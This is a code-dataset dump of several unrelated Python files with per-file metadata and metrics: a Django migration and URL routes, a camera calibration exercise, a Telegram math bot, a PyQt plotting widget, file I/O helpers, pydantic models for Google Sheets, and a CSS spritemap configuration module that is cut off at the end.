manulangat1/djcommerce
2cd92631479ef949e0f05a255f2f50feca728802
[ "MIT" ]
15
2020-05-04T13:22:32.000Z
2022-03-12T00:27:28.000Z
core/migrations/0011_itemvariation_variation.py
manulangat1/djcommerce
2cd92631479ef949e0f05a255f2f50feca728802
[ "MIT" ]
1
2020-10-17T08:54:31.000Z
2020-10-17T08:54:31.000Z
# Generated by Django 2.2.6 on 2020-02-09 12:24 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('core', '0010_auto_20200130_1135'), ] operations = [ migrations.CreateModel( name='Variation', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=50)), ('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.Item')), ], options={ 'unique_together': {('item', 'name')}, }, ), migrations.CreateModel( name='ItemVariation', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('value', models.CharField(max_length=50)), ('attachment', models.ImageField(upload_to='variations/')), ('variation', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.Variation')), ], options={ 'unique_together': {('variation', 'value')}, }, ), ]
34.789474
115
0.555219
126
1,322
5.698413
0.452381
0.044568
0.058496
0.091922
0.456825
0.384401
0.384401
0.384401
0.384401
0.384401
0
0.037716
0.298033
1,322
37
116
35.72973
0.735991
0.034039
0
0.387097
1
0
0.137255
0.018039
0
0
0
0
0
1
0
false
0
0.064516
0
0.16129
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
5dbe1aa985f0f74b54e5721ad988a0ced87ead89
469
py
Python
mygallary/urls.py
mangowilliam/my_gallary
4c87fe055e5c28d6ca6a27ea5bde7df380750006
[ "MIT" ]
null
null
null
mygallary/urls.py
mangowilliam/my_gallary
4c87fe055e5c28d6ca6a27ea5bde7df380750006
[ "MIT" ]
6
2021-03-19T02:06:21.000Z
2022-03-11T23:53:21.000Z
mygallary/urls.py
mangowilliam/my_gallary
4c87fe055e5c28d6ca6a27ea5bde7df380750006
[ "MIT" ]
null
null
null
from django.conf import settings from django.conf.urls.static import static from django.conf.urls import url from . import views urlpatterns = [ url('^$', views.gallary,name = 'gallary'), url(r'^search/', views.search_image, name='search_image'), url(r'^details/(\d+)',views.search_location,name ='images') ] if settings.DEBUG: urlpatterns+= static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)
20.391304
81
0.656716
58
469
5.206897
0.413793
0.099338
0.139073
0.119205
0
0
0
0
0
0
0
0
0.211087
469
23
82
20.391304
0.816216
0
0
0
0
0
0.104255
0
0
0
0
0
0
1
0
false
0
0.363636
0
0.363636
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
5dc01810c4c1797d877a743bdf67e61535eee657
1,914
py
Python
exercise_2/exercise_2.1.py
lukaszbinden/ethz-iacv-2020
271de804315de98b816cda3e2498958ffa87ad59
[ "MIT" ]
null
null
null
exercise_2/exercise_2.1.py
lukaszbinden/ethz-iacv-2020
271de804315de98b816cda3e2498958ffa87ad59
[ "MIT" ]
null
null
null
exercise_2/exercise_2.1.py
lukaszbinden/ethz-iacv-2020
271de804315de98b816cda3e2498958ffa87ad59
[ "MIT" ]
null
null
null
camera_width = 640 camera_height = 480 film_back_width = 1.417 film_back_height = 0.945 x_center = 320 y_center = 240 P_1 = (-0.023, -0.261, 2.376) p_11 = P_1[0] p_12 = P_1[1] p_13 = P_1[2] P_2 = (0.659, -0.071, 2.082) p_21 = P_2[0] p_22 = P_2[1] p_23 = P_2[2] p_1_prime = (52, 163) x_1 = p_1_prime[0] y_1 = p_1_prime[1] p_2_prime = (218, 216) x_2 = p_2_prime[0] y_2 = p_2_prime[1] f = 1.378 k_x = camera_width / film_back_width k_y = camera_height / film_back_height # f_k_x = f * k_x f_k_x = f # f_k_y = f * k_y f_k_y = f u_1_prime = (x_1 - x_center) / k_x v_1_prime = (y_1 - y_center) / k_y u_2_prime = (x_2 - x_center) / k_x v_2_prime = (y_2 - y_center) / k_y c_1_prime = (f_k_x * p_21 + (p_13 - p_23) * u_2_prime - u_2_prime/u_1_prime * f_k_x * p_11) / (f_k_x * (1 - u_2_prime/u_1_prime)) c_2_prime = (f_k_y * p_22 - (p_23 - (p_13*u_1_prime - f_k_x*(p_11 - c_1_prime))/u_1_prime) * v_2_prime) / f_k_y c_2_prime_alt = (f_k_y * p_12 - (p_13 - (p_13*u_1_prime - f_k_x*(p_11 - c_1_prime))/u_1_prime) * v_1_prime) / f_k_y c_3_prime = p_13 - (f_k_x / u_1_prime) * (p_11 - c_1_prime) rho_1_prime = p_13 - c_3_prime rho_2_prime = p_23 - c_3_prime print(f"C' = ({c_1_prime}, {c_2_prime}, {c_3_prime})") print(f"c_2_prime_alt = {c_2_prime_alt}") print(f"rho_1_prime = {rho_1_prime}") print(f"rho_2_prime = {rho_2_prime}") print("------------------") r_11 = f_k_x * (p_11 - c_1_prime) r_12 = f_k_y * (p_12 - c_2_prime) r_13 = 1 * (p_13 - c_3_prime) l_11 = rho_1_prime * u_1_prime l_12 = rho_1_prime * v_1_prime l_13 = rho_1_prime * 1 print(f"L: ({l_11}, {l_12}, {l_13})") print(f"R: ({r_11}, {r_12}, {r_13})") print("------------------") r_21 = f_k_x * (p_21 - c_1_prime) r_22 = f_k_y * (p_22 - c_2_prime) r_23 = 1 * (p_23 - c_3_prime) l_21 = rho_2_prime * u_2_prime l_22 = rho_2_prime * v_2_prime l_23 = rho_2_prime * 1 print(f"L: ({l_11}, {l_12}, {l_13})") print(f"R: ({r_11}, {r_12}, {r_13})")
23.060241
129
0.642633
484
1,914
2.02686
0.097107
0.171254
0.033639
0.024465
0.455657
0.247706
0.187564
0.167176
0.140673
0.140673
0
0.159091
0.172414
1,914
83
130
23.060241
0.460227
0.016196
0
0.105263
0
0
0.145213
0
0
0
0
0
0
1
0
false
0
0
0
0
0.175439
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
5dc1607dc008e8af7451051e5d28ffb9f945411a
998
py
Python
apps/zsh/singletons.py
codecat555/codecat555-fidgetingbits_knausj_talon
62f9be0459e6631c99d58eee97054ddd970cc5f3
[ "MIT" ]
4
2021-02-04T07:36:05.000Z
2021-07-03T06:53:30.000Z
apps/zsh/singletons.py
codecat555/codecat555-fidgetingbits_knausj_talon
62f9be0459e6631c99d58eee97054ddd970cc5f3
[ "MIT" ]
null
null
null
apps/zsh/singletons.py
codecat555/codecat555-fidgetingbits_knausj_talon
62f9be0459e6631c99d58eee97054ddd970cc5f3
[ "MIT" ]
null
null
null
# A rarely-updated module to assist in writing reload-safe talon modules using # things like threads, which are not normally safe for reloading with talon. # If this file is ever updated, you'll need to restart talon. import logging _singletons = {} def singleton(fn): name = f"{fn.__module__}.{fn.__name__}" # Do any cleanup actions from before. if name in _singletons: old = _singletons.pop(name) try: next(old) except StopIteration: pass else: logging.error( f"the old @singleton function {name} had more than one yield!" ) # Do the startup actions on the new object. it = iter(fn()) obj = next(it) # Remember the iterator so we can call the cleanup actions later. _singletons[name] = it # We want the object yielded by the iterator to be available at the name # of the function, so instead of returning a function we return an object. return obj
28.514286
78
0.645291
140
998
4.514286
0.621429
0.018987
0
0
0
0
0
0
0
0
0
0
0.288577
998
34
79
29.352941
0.890141
0.497996
0
0
0
0
0.179226
0.059063
0
0
0
0
0
1
0.055556
false
0.055556
0.055556
0
0.166667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
5dc4b2786f8172c270a1fc651693530424b90630
190
py
Python
python_program/condition.py
LiuKaiqiang94/PyStudyExample
b30212718b218c71e06b68677f55c33e3a1dbf46
[ "MIT" ]
5
2018-09-10T02:52:35.000Z
2018-09-20T07:50:42.000Z
python_program/condition.py
LiuKaiqiang94/PyStudyExample
b30212718b218c71e06b68677f55c33e3a1dbf46
[ "MIT" ]
null
null
null
python_program/condition.py
LiuKaiqiang94/PyStudyExample
b30212718b218c71e06b68677f55c33e3a1dbf46
[ "MIT" ]
null
null
null
def main(): val=int(input("input a num")) if val<10: print("A") elif val<20: print("B") elif val<30: print("C") else: print("D") main()
13.571429
33
0.442105
27
190
3.111111
0.62963
0.166667
0
0
0
0
0
0
0
0
0
0.05042
0.373684
190
13
34
14.615385
0.655462
0
0
0
0
0
0.079365
0
0
0
0
0
0
1
0.090909
false
0
0
0
0.090909
0.363636
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
5dc789560fb397b3832cccec69534dcbf26e36d2
5,902
py
Python
emilia/modules/math.py
masterisira/ELIZA_OF-master
02a7dbf48e4a3d4ee0981e6a074529ab1497aafe
[ "Unlicense" ]
null
null
null
emilia/modules/math.py
masterisira/ELIZA_OF-master
02a7dbf48e4a3d4ee0981e6a074529ab1497aafe
[ "Unlicense" ]
null
null
null
emilia/modules/math.py
masterisira/ELIZA_OF-master
02a7dbf48e4a3d4ee0981e6a074529ab1497aafe
[ "Unlicense" ]
null
null
null
from typing import List

import requests
from telegram import Message, Update, Bot, MessageEntity
from telegram.ext import CommandHandler, run_async

from emilia import dispatcher
from emilia.modules.disable import DisableAbleCommandHandler
from emilia.modules.helper_funcs.alternate import send_message

import pynewtonmath as newton
import math


def _expression(args):
    """Rebuild the expression string the user typed after the command.

    ``context.args`` is the list of whitespace-separated tokens following the
    command; joining them restores multi-word expressions such as ``2 + 2``.

    BUG FIX: the original handlers did ``args = str(context.args)`` and then
    ``args[0]``, which always sent the literal character ``'['`` (the first
    character of the list's repr) to the newton API instead of the user's
    expression.
    """
    return " ".join(args)


@run_async
def simplify(update, context):
    """/math: simplify an expression via the newton API."""
    message = update.effective_message
    message.reply_text(newton.simplify(_expression(context.args)))


@run_async
def factor(update, context):
    """/factor: factor an expression via the newton API."""
    message = update.effective_message
    message.reply_text(newton.factor(_expression(context.args)))


@run_async
def derive(update, context):
    """/derive: differentiate an expression via the newton API."""
    message = update.effective_message
    message.reply_text(newton.derive(_expression(context.args)))


@run_async
def integrate(update, context):
    """/integrate: integrate an expression via the newton API."""
    message = update.effective_message
    message.reply_text(newton.integrate(_expression(context.args)))


@run_async
def zeroes(update, context):
    """/zeroes: find the zeroes of an expression via the newton API."""
    message = update.effective_message
    message.reply_text(newton.zeroes(_expression(context.args)))


@run_async
def tangent(update, context):
    """/tangent: tangent line of f(x) at x=c; request format is c|f(x)."""
    message = update.effective_message
    message.reply_text(newton.tangent(_expression(context.args)))


@run_async
def area(update, context):
    """/area: area under f(x) between c and d; request format is c:d|f(x)."""
    message = update.effective_message
    message.reply_text(newton.area(_expression(context.args)))


@run_async
def cos(update, context):
    """/cos: cosine of an integer argument (radians)."""
    args = context.args
    message = update.effective_message
    message.reply_text(math.cos(int(args[0])))


@run_async
def sin(update, context):
    """/sin: sine of an integer argument (radians)."""
    args = context.args
    message = update.effective_message
    message.reply_text(math.sin(int(args[0])))


@run_async
def tan(update, context):
    """/tan: tangent of an integer argument (radians)."""
    args = context.args
    message = update.effective_message
    message.reply_text(math.tan(int(args[0])))


@run_async
def arccos(update, context):
    """/arccos: inverse cosine of an integer argument."""
    args = context.args
    message = update.effective_message
    message.reply_text(math.acos(int(args[0])))


@run_async
def arcsin(update, context):
    """/arcsin: inverse sine of an integer argument."""
    args = context.args
    message = update.effective_message
    message.reply_text(math.asin(int(args[0])))


@run_async
def arctan(update, context):
    """/arctan: inverse tangent of an integer argument."""
    args = context.args
    message = update.effective_message
    message.reply_text(math.atan(int(args[0])))


# NOTE: these two handler names shadow the builtins `abs` and `log` at module
# level; kept as-is because the handler registrations below reference them.
@run_async
def abs(update, context):
    """/abs: absolute value of an integer argument."""
    args = context.args
    message = update.effective_message
    message.reply_text(math.fabs(int(args[0])))


@run_async
def log(update, context):
    """/log: natural logarithm of an integer argument."""
    args = context.args
    message = update.effective_message
    message.reply_text(math.log(int(args[0])))


__help__ = """
Under Developmeent.. More features soon
 - /cos: Cosine `/cos pi`
 - /sin: Sine `/sin 0`
 - /tan: Tangent `/tan 0`
 - /arccos: Inverse Cosine `/arccos 1`
 - /arcsin: Inverse Sine `/arcsin 0`
 - /arctan: Inverse Tangent `/arctan 0`
 - /abs: Absolute Value `/abs -1`
 - /log: Logarithm `/log 2l8`

__Keep in mind__: To find the tangent line of a function at a certain x value, send the request as c|f(x) where c is the given x value and f(x) is the function expression, the separator is a vertical bar '|'. See the table above for an example request.
To find the area under a function, send the request as c:d|f(x) where c is the starting x value, d is the ending x value, and f(x) is the function under which you want the curve between the two x values.
To compute fractions, enter expressions as numerator(over)denominator. For example, to process 2/4 you must send in your expression as 2(over)4. The result expression will be in standard math notation (1/2, 3/4).
"""

SIMPLIFY_HANDLER = DisableAbleCommandHandler("math", simplify, pass_args=True)
FACTOR_HANDLER = DisableAbleCommandHandler("factor", factor, pass_args=True)
DERIVE_HANDLER = DisableAbleCommandHandler("derive", derive, pass_args=True)
INTEGRATE_HANDLER = DisableAbleCommandHandler("integrate", integrate, pass_args=True)
ZEROES_HANDLER = DisableAbleCommandHandler("zeroes", zeroes, pass_args=True)
TANGENT_HANDLER = DisableAbleCommandHandler("tangent", tangent, pass_args=True)
AREA_HANDLER = DisableAbleCommandHandler("area", area, pass_args=True)
COS_HANDLER = DisableAbleCommandHandler("cos", cos, pass_args=True)
SIN_HANDLER = DisableAbleCommandHandler("sin", sin, pass_args=True)
TAN_HANDLER = DisableAbleCommandHandler("tan", tan, pass_args=True)
ARCCOS_HANDLER = DisableAbleCommandHandler("arccos", arccos, pass_args=True)
ARCSIN_HANDLER = DisableAbleCommandHandler("arcsin", arcsin, pass_args=True)
ARCTAN_HANDLER = DisableAbleCommandHandler("arctan", arctan, pass_args=True)
ABS_HANDLER = DisableAbleCommandHandler("abs", abs, pass_args=True)
LOG_HANDLER = DisableAbleCommandHandler("log", log, pass_args=True)

dispatcher.add_handler(SIMPLIFY_HANDLER)
dispatcher.add_handler(FACTOR_HANDLER)
dispatcher.add_handler(DERIVE_HANDLER)
dispatcher.add_handler(INTEGRATE_HANDLER)
dispatcher.add_handler(ZEROES_HANDLER)
dispatcher.add_handler(TANGENT_HANDLER)
dispatcher.add_handler(AREA_HANDLER)
dispatcher.add_handler(COS_HANDLER)
dispatcher.add_handler(SIN_HANDLER)
dispatcher.add_handler(TAN_HANDLER)
dispatcher.add_handler(ARCCOS_HANDLER)
dispatcher.add_handler(ARCSIN_HANDLER)
dispatcher.add_handler(ARCTAN_HANDLER)
dispatcher.add_handler(ABS_HANDLER)
dispatcher.add_handler(LOG_HANDLER)

__mod_name__ = "Math"
__command_list__ = ["math", "factor", "derive", "integrate", "zeroes", "tangent", "area", "cos", "sin", "tan", "arccos", "arcsin", "arctan", "abs", "log"]
__handlers__ = [
    SIMPLIFY_HANDLER, FACTOR_HANDLER, DERIVE_HANDLER, INTEGRATE_HANDLER,
    TANGENT_HANDLER, ZEROES_HANDLER, AREA_HANDLER, COS_HANDLER, SIN_HANDLER,
    TAN_HANDLER, ARCCOS_HANDLER, ARCSIN_HANDLER, ARCTAN_HANDLER, ABS_HANDLER,
    LOG_HANDLER
]
35.769697
252
0.763978
803
5,902
5.43462
0.17061
0.075619
0.037809
0.082493
0.376031
0.36824
0.296517
0.296517
0.285518
0.285518
0
0.005975
0.120976
5,902
164
253
35.987805
0.835197
0
0
0.371429
0
0.021429
0.192138
0.004575
0
0
0
0
0
1
0.107143
false
0.107143
0.064286
0
0.171429
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
5dcd4858a80507237d1cda30d4f8de4336f40710
3,044
py
Python
src/views/age_results_widget.py
RubyMarsden/Crayfish
33bbb1248beec2fc40eee59e462711dd8cbc33da
[ "MIT" ]
null
null
null
src/views/age_results_widget.py
RubyMarsden/Crayfish
33bbb1248beec2fc40eee59e462711dd8cbc33da
[ "MIT" ]
8
2021-03-19T06:35:48.000Z
2021-03-31T14:23:24.000Z
src/views/age_results_widget.py
RubyMarsden/Crayfish
33bbb1248beec2fc40eee59e462711dd8cbc33da
[ "MIT" ]
null
null
null
import matplotlib
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QHBoxLayout, QDialog, QPushButton, QWidget, QVBoxLayout, QLabel

# Select the Qt5 backend before pyplot is imported.
matplotlib.use('QT5Agg')
import matplotlib.pyplot as plt

from models.data_key import DataKey
from utils import ui_utils


class AgeResultsWidget(QWidget):
    """Panel that plots per-scan ages (with errors) for the selected spot."""

    def __init__(self, results_dialog):
        QWidget.__init__(self)
        self.results_dialog = results_dialog

        outer = QHBoxLayout()
        outer.addLayout(self._create_widget())
        self.setLayout(outer)

        # Replot whenever the selected tree item or the configuration changes.
        results_dialog.sample_tree.tree.currentItemChanged.connect(lambda i, j: self.replot_graph())
        results_dialog.configuration_changed.connect(self.replot_graph)

    def _create_widget(self):
        column = QVBoxLayout()
        column.addWidget(QLabel("Sample and spot name"))
        column.addWidget(self._create_age_graph_and_point_selection())
        return column

    def _create_age_graph_and_point_selection(self):
        container = QWidget()
        column = QVBoxLayout()
        fig = plt.figure()
        self.axes = plt.axes()
        graph_widget, self.canvas = ui_utils.create_figure_widget(fig, self)
        column.addWidget(graph_widget)
        container.setLayout(column)
        return container

    ###############
    ### Actions ###
    ###############

    def replot_graph(self):
        """Redraw the plot for the currently selected spot, if any."""
        spot = self.results_dialog.sample_tree.current_spot()
        config = self.results_dialog.configuration_widget.current_config
        if config and spot:
            self.plot_cps_graph(spot, config)

    def plot_cps_graph(self, spot, config):
        """Plot age-vs-scan-number with error bars and the weighted age."""
        axis = self.axes
        axis.clear()
        if spot is None:
            return

        axis.spines['top'].set_visible(False)
        axis.spines['right'].set_visible(False)

        xs = []
        ys = []
        errors = []
        if DataKey.AGES not in spot.data[config]:
            # TODO plot words on graph
            return
        ages = spot.data[config][DataKey.AGES]
        if len(ages) != 0:
            for index, age in enumerate(ages):
                # String entries mark unusable scans — skip them entirely.
                if isinstance(age, str):
                    continue
                scan_number = index + 1
                value, uncertainty = age
                xs.append(scan_number)
                if value is None:
                    ys.append(0)
                    errors.append(0)
                else:
                    ys.append(value)
                    errors.append(uncertainty)
        else:
            # TODO plot some text
            return

        weighted_age, age_st_dev = spot.data[config][DataKey.WEIGHTED_AGE]
        if isinstance(weighted_age, str):
            label = "No weighted age"
        else:
            label = f"Weighted age: {weighted_age:.0f}, 1σ: {age_st_dev:.0f}"

        axis.errorbar(xs, ys, yerr=errors, linestyle="none", marker='o')
        axis.text(0.5, 1, label, transform=axis.transAxes, horizontalalignment="center")
        axis.set_xlabel("Scan number")
        axis.set_ylabel("Age (ka)")
        self.canvas.draw()
30.747475
100
0.598555
352
3,044
4.971591
0.352273
0.052
0.038857
0.026286
0.035429
0.035429
0
0
0
0
0
0.00608
0.297635
3,044
98
101
31.061224
0.812442
0.017411
0
0.109589
0
0
0.045054
0
0
0
0
0.010204
0
1
0.068493
false
0
0.082192
0
0.232877
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
5dcfe5f1b4cd41078d4a64e401536ccb2333c29f
1,827
py
Python
shortio/utils.py
byshyk/shortio
054014b3936495c86d2e2cd6a61c3cee9ab9b0f2
[ "MIT" ]
null
null
null
shortio/utils.py
byshyk/shortio
054014b3936495c86d2e2cd6a61c3cee9ab9b0f2
[ "MIT" ]
null
null
null
shortio/utils.py
byshyk/shortio
054014b3936495c86d2e2cd6a61c3cee9ab9b0f2
[ "MIT" ]
null
null
null
"""Contains utility functions.""" BIN_MODE_ARGS = {'mode', 'buffering', } TEXT_MODE_ARGS = {'mode', 'buffering', 'encoding', 'errors', 'newline'} def split_args(args): """Splits args into two groups: open args and other args. Open args are used by ``open`` function. Other args are used by ``load``/``dump`` functions. Args: args: Keyword args to split. Returns: open_args: Arguments for ``open``. other_args: Arguments for ``load``/``dump``. """ mode_args = BIN_MODE_ARGS if 'b' in args['mode'] else TEXT_MODE_ARGS open_args = {} other_args = {} for arg, value in args.items(): if arg in mode_args: open_args[arg] = value else: other_args[arg] = value return open_args, other_args def read_wrapper(load, **base_kwargs): """Wraps ``load`` function to avoid context manager boilerplate. Args: load: Function that takes the return of ``open``. **base_kwargs: Base arguments that ``open``/``load`` take. Returns: Wrapper for ``load``. """ def wrapped(file, **kwargs): open_args, load_args = split_args({**base_kwargs, **kwargs}) with open(file, **open_args) as f: return load(f, **load_args) return wrapped def write_wrapper(dump, **base_kwargs): """Wraps ``dump`` function to avoid context manager boilerplate. Args: dump: Function that takes the return of ``open`` and data to dump. **base_kwargs: Base arguments that ``open``/``dump`` take. Returns: Wrapper for ``dump``. """ def wrapped(file, obj, **kwargs): open_args, dump_args = split_args({**base_kwargs, **kwargs}) with open(file, **open_args) as f: dump(obj, f, **dump_args) return wrapped
26.478261
74
0.603175
235
1,827
4.531915
0.259574
0.075117
0.033803
0.039437
0.298592
0.298592
0.240376
0.097653
0.097653
0.097653
0
0
0.259442
1,827
68
75
26.867647
0.78714
0.423645
0
0.166667
0
0
0.054968
0
0
0
0
0
0
1
0.208333
false
0
0
0
0.375
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
5dd62019e7ff928c4383fc35d24cbff743f0c13d
2,157
py
Python
airbyte-integrations/connectors/source-google-sheets/google_sheets_source/models/spreadsheet.py
rajatariya21/airbyte
11e70a7a96e2682b479afbe6f709b9a5fe9c4a8d
[ "MIT" ]
null
null
null
airbyte-integrations/connectors/source-google-sheets/google_sheets_source/models/spreadsheet.py
rajatariya21/airbyte
11e70a7a96e2682b479afbe6f709b9a5fe9c4a8d
[ "MIT" ]
4
2021-04-30T08:10:26.000Z
2021-04-30T13:53:34.000Z
airbyte-integrations/connectors/source-google-sheets/google_sheets_source/models/spreadsheet.py
rajatariya21/airbyte
11e70a7a96e2682b479afbe6f709b9a5fe9c4a8d
[ "MIT" ]
null
null
null
# MIT License # # Copyright (c) 2020 Airbyte # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. 
# Pydantic models mirroring the subset of the Google Sheets API spreadsheet
# resource that this connector reads.  Every model sets ``extra = Extra.allow``
# so unrecognized fields returned by the API are kept instead of rejected.

from __future__ import annotations

from typing import List, Optional

from pydantic import BaseModel, Extra, Field


class SpreadsheetProperties(BaseModel):
    # Top-level spreadsheet properties; only the title is modeled explicitly.
    class Config:
        extra = Extra.allow

    title: Optional[str] = None


class SheetProperties(BaseModel):
    # Per-sheet (tab) properties; only the title is modeled explicitly.
    class Config:
        extra = Extra.allow

    title: Optional[str] = None


class CellData(BaseModel):
    # A single cell; formattedValue is the user-visible rendered string.
    class Config:
        extra = Extra.allow

    formattedValue: Optional[str] = None


class RowData(BaseModel):
    # One row: an ordered list of cells.
    class Config:
        extra = Extra.allow

    values: Optional[List[CellData]] = None


class GridData(BaseModel):
    # A rectangular block of rows within a sheet.
    class Config:
        extra = Extra.allow

    rowData: Optional[List[RowData]] = None


class Sheet(BaseModel):
    # One sheet (tab): its grid data plus its properties.
    class Config:
        extra = Extra.allow

    data: Optional[List[GridData]] = None
    properties: Optional[SheetProperties] = None


class Spreadsheet(BaseModel):
    # The whole spreadsheet resource; spreadsheetId and sheets are required.
    class Config:
        extra = Extra.allow

    spreadsheetId: str
    sheets: List[Sheet]
    properties: Optional[SpreadsheetProperties] = None
26.62963
80
0.730644
280
2,157
5.614286
0.446429
0.05598
0.089059
0.111323
0.187659
0.187659
0.076336
0.076336
0.076336
0.076336
0
0.002327
0.20306
2,157
80
81
26.9625
0.912158
0.49096
0
0.470588
0
0
0
0
0
0
0
0
0
1
0
false
0
0.088235
0
0.794118
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
5dd6c916a8fdc58e1d4d7d9b990faa3a6330daf0
3,957
py
Python
spritecss/config.py
yostudios/Spritemapper
277cb76a14be639b6d7fa3191bc427409e72ad69
[ "MIT" ]
49
2015-01-22T14:27:32.000Z
2021-12-24T23:07:40.000Z
spritecss/config.py
tzuryby/Spritemapper
7cd3b68348a86982420b6231861fda4a0e676f35
[ "MIT" ]
2
2015-02-12T12:31:34.000Z
2015-04-12T10:43:17.000Z
spritecss/config.py
tzuryby/Spritemapper
7cd3b68348a86982420b6231861fda4a0e676f35
[ "MIT" ]
6
2015-04-03T07:29:54.000Z
2021-12-15T02:21:35.000Z
# NOTE: this is Python 2 code (imap/ifilter, urlparse, print statements,
# dict.iteritems); do not run it under Python 3 without porting.

import shlex
from os import path
from itertools import imap, ifilter
from urlparse import urljoin

from .css import CSSParser, iter_events


def parse_config_stmt(line, prefix="spritemapper."):
    # Parse one "spritemapper.key = value" line into a (key, value) pair;
    # returns None (implicitly) for lines that are not config statements.
    line = line.strip()
    if line.startswith(prefix) and "=" in line:
        (key, value) = line.split("=", 1)
        return (key[len(prefix):].strip(), value.strip())


def iter_config_stmts(data):
    # Yield (key, value) pairs for every config statement in *data*,
    # dropping the None results for non-matching lines.
    return ifilter(None, imap(parse_config_stmt, data.splitlines()))


def iter_css_config(parser):
    # Config statements live inside CSS comments; scan comment lexemes only.
    for ev in iter_events(parser, lexemes=("comment",)):
        for v in iter_config_stmts(ev.comment):
            yield v


class CSSConfig(object):
    """Spritemapper configuration collected from CSS comments.

    Values from *parser* override those in *base*; *root* (defaulting to the
    directory of *fname*) anchors all relative paths.
    """

    def __init__(self, parser=None, base=None, root=None, fname=None):
        if fname and root is None:
            root = path.dirname(fname)
        self.root = root
        # Copy *base* so mutating this config never affects the parent.
        self._data = dict(base) if base else {}
        if parser is not None:
            self._data.update(iter_css_config(parser))

    def __iter__(self):
        # this is mostly so you can go CSSConfig(base=CSSConfig(..))
        return self._data.iteritems()

    @classmethod
    def from_file(cls, fname):
        # Alternate constructor: parse *fname* directly.
        with open(fname, "rb") as fp:
            return cls(CSSParser.from_file(fp), fname=fname)

    def normpath(self, p):
        """Normalize a possibly relative path *p* to the root."""
        return path.normpath(path.join(self.root, p))

    def absurl(self, p):
        """Make an absolute reference to *p* from any configured base URL."""
        base = self.base_url
        if base:
            p = urljoin(base, p)
        return p

    @property
    def base_url(self):
        # Optional base URL for absolute references; None if unset.
        return self._data.get("base_url")

    @property
    def sprite_dirs(self):
        # List of directories to spritemap, or None if unset.  Mutually
        # exclusive with output_image.
        if "sprite_dirs" not in self._data:
            return
        elif self._data.get("output_image"):
            raise RuntimeError("cannot have sprite_dirs "
                               "when output_image is set")
        sdirs = shlex.split(self._data["sprite_dirs"])
        return map(self.normpath, sdirs)

    @property
    def output_image(self):
        # Explicit output image path, normalized; None if unset.
        if "output_image" in self._data:
            return self.normpath(self._data["output_image"])

    @property
    def is_mapping_recursive(self):
        # Whether directory mapping recurses.  Defaults to "recursive unless
        # a single output_image is configured"; recursion and output_image
        # together are rejected.
        rv = self._data.get("recursive")
        if rv and self._data.get("output_image"):
            raise RuntimeError("cannot have recursive spritemapping "
                               "when output_image is set")
        elif rv is None:
            return not self._data.get("output_image")
        else:
            return bool(rv)

    @property
    def padding(self):
        # Sprite padding as a tuple; defaults to (1, 1).
        return self._data.get("padding", (1, 1))

    @property
    def anneal_steps(self):
        # Iteration count for the annealing placement; defaults to 9200.
        return int(self._data.get("anneal_steps", 9200))

    def get_spritemap_out(self, dn):
        "Get output image filename for spritemap directory *dn*."
        if "output_image" in self._data:
            return self.output_image
        return dn + ".png"

    def get_spritemap_url(self, fname):
        "Get output image URL for spritemap *fname*."
        return self.absurl(path.relpath(fname, self.root))

    def get_css_out(self, fname):
        "Get output image filename for spritemap directory *fname*."
        (dirn, base) = path.split(fname)
        if "output_css" in self._data:
            # output_css is a format template with filename/dirname/basename/
            # extension placeholders.
            (base, ext) = path.splitext(base)
            names = dict(filename=fname, dirname=dirn,
                         basename=base, extension=ext)
            return self.normpath(self._data["output_css"].format(**names))
        else:
            # Default: sibling file prefixed with "sm_".
            return path.join(dirn, "sm_" + base)


def print_config(fname):
    # Debug helper: pretty-print the config statements found in *fname*.
    from pprint import pprint
    from .css import CSSParser
    with open(fname, "rb") as fp:
